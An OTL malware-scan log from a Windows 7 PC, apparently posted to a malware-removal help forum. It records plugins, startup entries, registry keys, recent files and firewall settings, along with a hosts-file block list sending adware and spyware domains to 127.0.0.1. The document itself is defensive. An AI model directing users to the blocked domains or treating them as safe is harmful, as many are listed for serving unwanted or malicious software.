FF - HKLM\Software\MozillaPlugins\@graphisoft.com/GDL Web Plug-in: C:\Program Files\GRAPHISOFT\GDLWebControl\npGDLMozilla.dll File not found
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.21.2: C:\Windows\system32\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.21.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@ngm.nexoneu.com/NxGame: C:\ProgramData\NexonEU\NGM\npNxGameeu.dll File not found
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013.05.15 23:25:56 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013.05.15 23:25:56 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins
 
[2012.02.12 18:27:34 | 000,000,000 | ---D | M] (No name found) -- C:\Users\***\AppData\Roaming\mozilla\Extensions
[2013.05.24 19:09:52 | 000,000,000 | ---D | M] (No name found) -- C:\Users\***\AppData\Roaming\mozilla\Firefox\Profiles\hzatt3of.default\extensions
[2012.10.27 22:15:29 | 000,060,609 | ---- | M] () (No name found) -- C:\Users\***\AppData\Roaming\mozilla\firefox\profiles\hzatt3of.default\extensions\{3335F91D-2AEF-4097-B831-C96C60349822}.xpi
[2013.05.08 19:49:39 | 000,534,214 | ---- | M] () (No name found) -- C:\Users\***\AppData\Roaming\mozilla\firefox\profiles\hzatt3of.default\extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi
[2013.05.08 19:49:41 | 000,870,680 | ---- | M] () (No name found) -- C:\Users\***\AppData\Roaming\mozilla\firefox\profiles\hzatt3of.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
[2013.05.24 19:09:52 | 000,269,448 | ---- | M] () (No name found) -- C:\Users\***\AppData\Roaming\mozilla\firefox\profiles\hzatt3of.default\extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi
[2013.04.13 14:38:08 | 000,000,000 | ---D | M] (No name found) -- C:\Programme\Mozilla Firefox\extensions
[2013.04.13 14:38:10 | 000,263,064 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll
[2013.02.16 02:35:09 | 000,002,465 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml
[2013.02.16 02:35:09 | 000,002,086 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\twitter.xml
 
O1 HOSTS File: ([2012.12.20 18:00:42 | 000,444,830 | R--- | M]) - C:\Windows\System32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1	www.007guard.com
O1 - Hosts: 127.0.0.1	007guard.com
O1 - Hosts: 127.0.0.1	008i.com
O1 - Hosts: 127.0.0.1	www.008k.com
O1 - Hosts: 127.0.0.1	008k.com
O1 - Hosts: 127.0.0.1	www.00hq.com
O1 - Hosts: 127.0.0.1	00hq.com
O1 - Hosts: 127.0.0.1	010402.com
O1 - Hosts: 127.0.0.1	www.032439.com
O1 - Hosts: 127.0.0.1	032439.com
O1 - Hosts: 127.0.0.1	www.0scan.com
O1 - Hosts: 127.0.0.1	0scan.com
O1 - Hosts: 127.0.0.1	www.1000gratisproben.com
O1 - Hosts: 127.0.0.1	1000gratisproben.com
O1 - Hosts: 127.0.0.1	1001namen.com
O1 - Hosts: 127.0.0.1	www.1001namen.com
O1 - Hosts: 127.0.0.1	100888290cs.com
O1 - Hosts: 127.0.0.1	www.100888290cs.com
O1 - Hosts: 127.0.0.1	www.100sexlinks.com
O1 - Hosts: 127.0.0.1	100sexlinks.com
O1 - Hosts: 127.0.0.1	www.10sek.com
O1 - Hosts: 127.0.0.1	10sek.com
O1 - Hosts: 127.0.0.1	www.1-2005-search.com
O1 - Hosts: 127.0.0.1	1-2005-search.com
O1 - Hosts: 127.0.0.1	www.123fporn.info
O1 - Hosts: 15276 more lines...
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (Windows Live ID Sign-in Helper) - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Programme\Common Files\microsoft shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Programme\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O4 - HKLM..\Run: [avgnt] C:\Program Files\Avira\AntiVir Desktop\avgnt.exe (Avira Operations GmbH & Co. KG)
O4 - HKLM..\Run: [NvCplDaemon] C:\Windows\System32\NvCpl.dll (NVIDIA Corporation)
O4 - HKLM..\Run: [QuickSet] C:\Programme\Dell\QuickSet\quickset.exe (Dell Inc.)
O4 - HKLM..\Run: [SDTray] C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe (Safer-Networking Ltd.)
O4 - HKU\S-1-5-19..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun File not found
O4 - HKU\S-1-5-20..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun File not found
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (Microsoft Corporation)
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (Microsoft Corporation)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O8 - Extra context menu item: Nach Microsoft E&xcel exportieren - C:\Programme\Microsoft Office\Office14\EXCEL.EXE (Microsoft Corporation)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000007 [] - C:\Programme\Common Files\microsoft shared\Windows Live\WLIDNSP.DLL (Microsoft Corp.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000008 [] - C:\Programme\Common Files\microsoft shared\Windows Live\WLIDNSP.DLL (Microsoft Corp.)
O13 - gopher Prefix: missing
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_10-windows-i586.cab (Reg Error: Value error.)
O16 - DPF: {CAFEEFAC-0017-0000-0010-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_10-windows-i586.cab (Java Plug-in 1.7.0_10)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_10-windows-i586.cab (Java Plug-in 10.21.2)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1 192.168.0.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{1D5F7FC6-F032-4390-86F3-C504DF7C959F}: DhcpNameServer = 192.168.42.129
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{A5636BE9-90A9-41AC-B99B-606CB3800402}: DhcpNameServer = 192.168.1.1 192.168.0.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{A58C0733-93A3-4E46-9CCF-6B48AC9B8731}: DhcpNameServer = 192.168.42.129
O18 - Protocol\Handler\ms-help {314111c7-a502-11d2-bbca-00c04f8ec294} - c:\Programme\Common Files\microsoft shared\Help\hxds.dll (Microsoft Corporation)
O18 - Protocol\Handler\wlpg {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Programme\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll (Microsoft Corporation)
O18 - Protocol\Filter\text/xml {807573E5-5146-11D5-A672-00B0D022E945} - C:\Programme\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: VMApplet - (SystemPropertiesPerformance.exe) - C:\Windows\System32\SystemPropertiesPerformance.exe (Microsoft Corporation)
O20 - Winlogon\Notify\SDWinLogon: DllName - (SDWinLogon.dll) -  File not found
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2009.06.10 23:42:20 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2013.05.25 09:08:12 | 000,000,000 | ---D | C] -- C:\Windows\ERUNT
[2013.05.25 09:08:03 | 000,000,000 | ---D | C] -- C:\JRT
[2013.05.25 09:06:26 | 000,545,954 | ---- | C] (Oleg N. Scherbakov) -- C:\Users\***\Desktop\JRT.exe
[2013.05.24 23:34:47 | 002,237,968 | ---- | C] (Kaspersky Lab ZAO) -- C:\Users\***\Desktop\tdsskiller.exe
[2013.05.24 23:25:35 | 004,745,728 | ---- | C] (AVAST Software) -- C:\Users\***\Desktop\aswMBR.exe
[2013.05.24 23:16:21 | 000,000,000 | ---D | C] -- C:\Users\***\Desktop\mbar-1.05.0.1001
[2013.05.24 19:36:07 | 000,000,000 | ---D | C] -- C:\Users\***\Desktop\sbb
[2013.05.24 19:11:42 | 000,000,000 | ---D | C] -- C:\Users\***\Desktop\Neuer Ordner
[2013.05.24 19:11:40 | 000,000,000 | ---D | C] -- C:\Users\***\Documents\StreamTransport
[2013.05.22 14:05:24 | 000,000,000 | ---D | C] -- C:\Users\***\Documents\ProcAlyzer Dumps
[2013.05.21 18:07:11 | 000,000,000 | ---D | C] -- C:\Users\***\Desktop\2013_05_21
[2013.05.21 12:11:14 | 000,000,000 | ---D | C] -- C:\ProgramData\Spybot - Search & Destroy
[2013.05.21 12:11:13 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
[2013.05.21 12:11:09 | 000,015,224 | ---- | C] (Safer Networking Limited) -- C:\Windows\System32\sdnclean.exe
[2013.05.21 12:11:05 | 000,000,000 | ---D | C] -- C:\Program Files\Spybot - Search & Destroy 2
[2013.05.18 13:36:38 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\***\Desktop\OTL.exe
[2013.05.18 13:21:46 | 000,000,000 | ---D | C] -- C:\Users\***\AppData\Roaming\Malwarebytes
[2013.05.18 13:21:40 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes' Anti-Malware
[2013.05.18 13:21:40 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2013.05.18 13:21:39 | 000,022,856 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\System32\drivers\mbam.sys
[2013.05.18 13:21:39 | 000,000,000 | ---D | C] -- C:\Program Files\Malwarebytes' Anti-Malware
[2013.05.13 13:18:05 | 000,000,000 | ---D | C] -- C:\Program Files\FileZilla FTP Client
[2013.05.11 21:35:00 | 000,000,000 | ---D | C] -- C:\Users\***\AppData\Local\Corsair
[2013.04.25 18:32:43 | 000,000,000 | ---D | C] -- C:\ProgramData\SafeNet Sentinel
 
========== Files - Modified Within 30 Days ==========
 
[2013.05.25 09:12:56 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2013.05.25 09:12:50 | 2156,863,488 | -HS- | M] () -- C:\hiberfil.sys
[2013.05.25 09:09:04 | 000,014,832 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2013.05.25 09:09:04 | 000,014,832 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2013.05.25 09:07:54 | 000,696,870 | ---- | M] () -- C:\Windows\System32\perfh007.dat
[2013.05.25 09:07:54 | 000,652,148 | ---- | M] () -- C:\Windows\System32\perfh009.dat
[2013.05.25 09:07:54 | 000,148,134 | ---- | M] () -- C:\Windows\System32\perfc007.dat
[2013.05.25 09:07:54 | 000,121,080 | ---- | M] () -- C:\Windows\System32\perfc009.dat
[2013.05.25 09:07:40 | 000,718,393 | ---- | M] () -- C:\Users\***\Desktop\Avira hat _HTML_Infected.WebPage.Gen3_ auf meiner Homepage gefunden - Trojaner-Board.mht
[2013.05.25 09:06:54 | 000,632,031 | ---- | M] () -- C:\Users\***\Desktop\adwcleaner.exe
[2013.05.25 09:06:26 | 000,545,954 | ---- | M] (Oleg N. Scherbakov) -- C:\Users\***\Desktop\JRT.exe
[2013.05.24 23:34:49 | 002,237,968 | ---- | M] (Kaspersky Lab ZAO) -- C:\Users\***\Desktop\tdsskiller.exe
[2013.05.24 23:33:56 | 000,000,512 | ---- | M] () -- C:\Users\***\Desktop\MBR.dat
[2013.05.24 23:27:07 | 004,745,728 | ---- | M] (AVAST Software) -- C:\Users\***\Desktop\aswMBR.exe
[2013.05.24 23:16:00 | 012,917,756 | ---- | M] () -- C:\Users\***\Desktop\mbar-1.05.0.1001.zip
[2013.05.24 21:55:41 | 000,198,724 | ---- | M] () -- C:\Users\***\Desktop\TeamSpybot-20130524-215540.cab
[2013.05.24 21:55:41 | 000,196,044 | ---- | M] () -- C:\Users\***\Desktop\Desktop-20130524-215540.png
[2013.05.24 19:20:33 | 002,221,963 | ---- | M] () -- C:\Users\***\Desktop\20130524_082418.jpg
[2013.05.24 19:11:12 | 281,003,117 | ---- | M] () -- C:\Users\***\Documents\mp4INS12_001Fiji_0523_high.mp4videoId=2405726725001&lineUpId=&pubId=900189268001&playerId=1254928709001&affiliateId=.flv
[2013.05.23 23:55:05 | 000,000,060 | ---- | M] () -- C:\Windows\wpd99.drv
[2013.05.22 14:24:42 | 000,179,910 | ---- | M] () -- C:\Users\***\Desktop\BKT-Maturathemen.pdf
[2013.05.21 23:32:21 | 001,600,740 | ---- | M] () -- C:\Users\***\Desktop\EINS.pdf
[2013.05.21 14:11:49 | 000,007,663 | ---- | M] () -- C:\Users\***\AppData\Local\Resmon.ResmonCfg
[2013.05.21 12:11:14 | 000,002,123 | ---- | M] () -- C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
[2013.05.18 14:57:26 | 001,335,066 | ---- | M] () -- C:\Users\***\Desktop\Unbenannt2.png
[2013.05.18 14:31:57 | 000,000,000 | ---- | M] () -- C:\Users\***\defogger_reenable
[2013.05.18 14:30:15 | 000,406,632 | ---- | M] () -- C:\Windows\System32\FNTCACHE.DAT
[2013.05.18 14:29:23 | 001,339,650 | ---- | M] () -- C:\Users\***\Desktop\Vollständige Virenbeschreibung.mht
[2013.05.18 14:29:17 | 000,427,757 | ---- | M] () -- C:\Users\***\Desktop\Für alle Hilfesuchenden! Was muss ich vor der Eröffnung eines Themas beachten_ - Trojaner-Board.mht
[2013.05.18 14:28:53 | 000,377,856 | ---- | M] () -- C:\Users\***\Desktop\gmer_2.1.19163.exe
[2013.05.18 14:27:14 | 000,050,477 | ---- | M] () -- C:\Users\***\Desktop\Defogger.exe
[2013.05.18 14:23:45 | 000,013,194 | ---- | M] () -- C:\Users\***\Desktop\Unbenannt.png
[2013.05.18 13:36:38 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\***\Desktop\OTL.exe
[2013.05.18 13:21:40 | 000,001,071 | ---- | M] () -- C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
[2013.05.15 23:41:26 | 000,307,200 | ---- | M] () -- C:\Windows\SetACL.exe
[2013.05.15 13:27:46 | 000,102,296 | ---- | M] () -- C:\Users\***\Desktop\English klausi.pdf
[2013.05.15 11:46:24 | 000,220,939 | ---- | M] () -- C:\Users\***\Desktop\English Stichwörter 2.pdf
[2013.05.15 11:46:16 | 000,176,352 | ---- | M] () -- C:\Users\***\Desktop\English Stichwörter 1.pdf
[2013.05.13 19:50:59 | 000,001,386 | ---- | M] () -- C:\Users\***\Desktop\SBB.lnk
[2013.05.13 19:50:57 | 000,001,426 | ---- | M] () -- C:\Users\***\Desktop\English.lnk
[2013.05.13 19:50:54 | 000,001,386 | ---- | M] () -- C:\Users\***\Desktop\BKT.lnk
 
========== Files Created - No Company Name ==========
 
[2013.05.25 09:06:54 | 000,632,031 | ---- | C] () -- C:\Users\***\Desktop\adwcleaner.exe
[2013.05.24 23:33:56 | 000,000,512 | ---- | C] () -- C:\Users\***\Desktop\MBR.dat
[2013.05.24 23:18:21 | 000,718,393 | ---- | C] () -- C:\Users\***\Desktop\Avira hat _HTML_Infected.WebPage.Gen3_ auf meiner Homepage gefunden - Trojaner-Board.mht
[2013.05.24 23:15:49 | 012,917,756 | ---- | C] () -- C:\Users\***\Desktop\mbar-1.05.0.1001.zip
[2013.05.24 21:55:41 | 000,198,724 | ---- | C] () -- C:\Users\***\Desktop\TeamSpybot-20130524-215540.cab
[2013.05.24 21:55:41 | 000,196,044 | ---- | C] () -- C:\Users\***\Desktop\Desktop-20130524-215540.png
[2013.05.24 19:12:04 | 002,221,963 | ---- | C] () -- C:\Users\***\Desktop\20130524_082418.jpg
[2013.05.24 18:54:35 | 281,003,117 | ---- | C] () -- C:\Users\***\Documents\mp4INS12_001Fiji_0523_high.mp4videoId=2405726725001&lineUpId=&pubId=900189268001&playerId=1254928709001&affiliateId=.flv
[2013.05.22 14:23:51 | 000,179,910 | ---- | C] () -- C:\Users\***\Desktop\BKT-Maturathemen.pdf
[2013.05.21 23:34:44 | 000,220,939 | ---- | C] () -- C:\Users\***\Desktop\English Stichwörter 2.pdf
[2013.05.21 23:34:44 | 000,176,352 | ---- | C] () -- C:\Users\***\Desktop\English Stichwörter 1.pdf
[2013.05.21 23:34:44 | 000,102,296 | ---- | C] () -- C:\Users\***\Desktop\English klausi.pdf
[2013.05.21 23:32:16 | 001,600,740 | ---- | C] () -- C:\Users\***\Desktop\EINS.pdf
[2013.05.21 12:11:14 | 000,002,135 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
[2013.05.21 12:11:14 | 000,002,123 | ---- | C] () -- C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
[2013.05.18 14:57:26 | 001,335,066 | ---- | C] () -- C:\Users\***\Desktop\Unbenannt2.png
[2013.05.18 14:31:57 | 000,000,000 | ---- | C] () -- C:\Users\***\defogger_reenable
[2013.05.18 14:30:09 | 000,406,632 | ---- | C] () -- C:\Windows\System32\FNTCACHE.DAT
[2013.05.18 14:29:22 | 001,339,650 | ---- | C] () -- C:\Users\***\Desktop\Vollständige Virenbeschreibung.mht
[2013.05.18 14:29:17 | 000,427,757 | ---- | C] () -- C:\Users\***\Desktop\Für alle Hilfesuchenden! Was muss ich vor der Eröffnung eines Themas beachten_ - Trojaner-Board.mht
[2013.05.18 14:28:53 | 000,377,856 | ---- | C] () -- C:\Users\***\Desktop\gmer_2.1.19163.exe
[2013.05.18 14:27:13 | 000,050,477 | ---- | C] () -- C:\Users\***\Desktop\Defogger.exe
[2013.05.18 14:23:45 | 000,013,194 | ---- | C] () -- C:\Users\***\Desktop\Unbenannt.png
[2013.05.18 13:21:40 | 000,001,071 | ---- | C] () -- C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
[2013.05.15 23:37:59 | 000,307,200 | ---- | C] () -- C:\Windows\SetACL.exe
[2013.05.13 19:50:59 | 000,001,386 | ---- | C] () -- C:\Users\***\Desktop\SBB.lnk
[2013.05.13 19:50:57 | 000,001,426 | ---- | C] () -- C:\Users\***\Desktop\English.lnk
[2013.05.13 19:50:54 | 000,001,386 | ---- | C] () -- C:\Users\***\Desktop\BKT.lnk
[2013.05.13 13:46:45 | 000,007,663 | ---- | C] () -- C:\Users\***\AppData\Local\Resmon.ResmonCfg
[2013.04.17 19:14:54 | 000,002,831 | ---- | C] () -- C:\Users\***\AppData\Local\recently-used.xbel
[2013.03.21 14:15:11 | 000,000,044 | ---- | C] () -- C:\Windows\AuerSetups.ini
[2012.12.15 01:06:37 | 000,010,593 | ---- | C] () -- C:\Windows\CSTBox.INI
[2012.12.14 09:56:57 | 000,000,040 | ---- | C] () -- C:\Users\***\AppData\Local\tmp.no23
[2012.10.19 17:27:14 | 000,081,408 | ---- | C] () -- C:\Windows\cadkasdeinst01.exe
[2012.09.19 21:28:00 | 000,001,480 | ---- | C] () -- C:\Users\***\AppData\Local\RecConfig.xml
[2012.08.17 23:18:27 | 000,000,079 | ---- | C] () -- C:\Users\***\AppData\Local\CrystalDiskMark30.ini
[2012.06.27 15:29:23 | 000,000,147 | ---- | C] () -- C:\ProgramData\Microsoft.SqlServer.Compact.351.32.bc
[2012.02.12 20:15:11 | 000,036,864 | ---- | C] () -- C:\Windows\System32\pdf995mon.dll
[2012.02.12 20:15:11 | 000,000,060 | ---- | C] () -- C:\Windows\wpd99.drv
[2012.02.12 19:05:08 | 000,080,416 | ---- | C] () -- C:\Windows\System32\RtNicProp32.dll
[2012.02.12 19:02:39 | 000,870,560 | ---- | C] () -- C:\Windows\System32\igkrng575.bin
[2012.02.12 19:02:39 | 000,208,896 | ---- | C] () -- C:\Windows\System32\iglhsip32.dll
[2012.02.12 19:02:39 | 000,143,360 | ---- | C] () -- C:\Windows\System32\iglhcp32.dll
[2012.02.12 19:02:38 | 000,104,796 | ---- | C] () -- C:\Windows\System32\igfcg575m.bin
[2012.02.12 19:02:38 | 000,004,096 | ---- | C] ( ) -- C:\Windows\System32\IGFXDEVLib.dll
[2012.02.12 19:02:37 | 000,127,868 | ---- | C] () -- C:\Windows\System32\igcompkrng575.bin
[2012.02.12 19:02:11 | 000,094,208 | ---- | C] () -- C:\Windows\System32\IccLibDll.dll
[2012.02.12 19:02:10 | 000,000,151 | ---- | C] () -- C:\Windows\System32\GfxUI.exe.config
[2011.11.08 00:08:38 | 000,508,224 | ---- | C] () -- C:\Windows\System32\ICCProfiles.dll
 
========== ZeroAccess Check ==========
 
[2009.07.14 06:42:31 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2012.06.09 06:41:00 | 012,873,728 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010.11.20 14:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\system32\wbem\wbemess.dll -- [2009.07.14 03:16:17 | 000,342,528 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

< End of report >

--- --- ---

OTL Logfile:

Code:

ATTFilter

OTL Extras logfile created on: 25.05.2013 09:15:39 - Run 4
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\\Desktop
 Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.10.9200.16540)
Locale: 00000c07 | Country: Österreich | Language: DEA | Date Format: dd.MM.yyyy
 
2,68 Gb Total Physical Memory | 1,64 Gb Available Physical Memory | 61,05% Memory free
5,35 Gb Paging File | 4,28 Gb Available in Paging File | 79,85% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 100,00 Gb Total Space | 50,04 Gb Free Space | 50,04% Space Free | Partition Type: NTFS
 
Computer Name: *** | User Name:  | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\System32\control.exe (Microsoft Corporation)
.hlp [@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)
.html [@ = Opera.HTML] -- C:\Program Files\Opera\Opera.exe (Opera Software)
 
========== Shell Spawning ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)
htmlfile [edit] -- Reg Error: Key error.
htmlfile [print] -- "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1"
http [open] -- "C:\Program Files\Opera\Opera.exe" "%1" (Opera Software)
https [open] -- "C:\Program Files\Opera\Opera.exe" "%1" (Opera Software)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
========== Security Center Settings ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = Reg Error: Unknown registry data type -- File not found
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
========== Authorized Applications List ==========
 
